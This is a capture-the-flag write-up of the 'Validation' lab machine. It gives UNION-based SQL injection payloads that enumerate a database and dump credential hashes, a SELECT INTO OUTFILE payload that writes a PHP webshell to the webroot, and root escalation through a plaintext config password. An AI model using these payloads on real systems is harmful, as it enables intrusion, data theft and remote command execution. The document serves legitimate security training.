Validation is a classic SQL injection machine that allows writing a PHP webshell directly to the webroot using
SELECT ... INTO OUTFILE.
Once command execution is obtained, privilege escalation is trivial thanks to a configuration file containing
clear‑text credentials.
Target: validation.htb
Initial vector: SQL injection → write webshell
Privilege escalation: plaintext password in configuration file
Nmap:
22/tcp ssh 80/tcp http (Apache 2.4.48) 4566/tcp nginx (403) 8080/tcp nginx (502)
Only port 80 shows a working web application. The login form is vulnerable to SQL injection.
Basic UNION‑based enumeration:
' UNION SELECT schema_name FROM information_schema.schemata-- -
Enumerate tables:
' UNION SELECT table_name FROM information_schema.tables WHERE table_schema="registration"-- -
Enumerate columns:
' UNION SELECT column_name FROM information_schema.columns WHERE table_schema="registration" AND table_name="registration"-- -
Dump user data:
' UNION SELECT group_concat(username,0x3a,userhash) FROM registration-- -
The hashes correspond only to test users — nothing useful. Instead, use SQL injection to write a PHP webshell:
' UNION SELECT "" INTO OUTFILE "/var/www/html/myshell.php"-- -
Now execute commands:
http://validation.htb/myshell.php?cmd=id http://validation.htb/myshell.php?cmd=whoami
A remote shell is obtained.
Enumerate the webroot:
$ ls -la /var/www/html/
A hidden configuration file contains plaintext credentials:
db_user = root db_pass =
Use the password to switch to root:
$ su Password:
Root access obtained.
Retrieve /root/root.txt.
Validation is a straightforward SQL injection machine: enumerate the database, write a PHP webshell using
INTO OUTFILE, and escalate privileges using credentials stored in a configuration file.
A clean example of why SQL injection combined with insecure file permissions is so dangerous.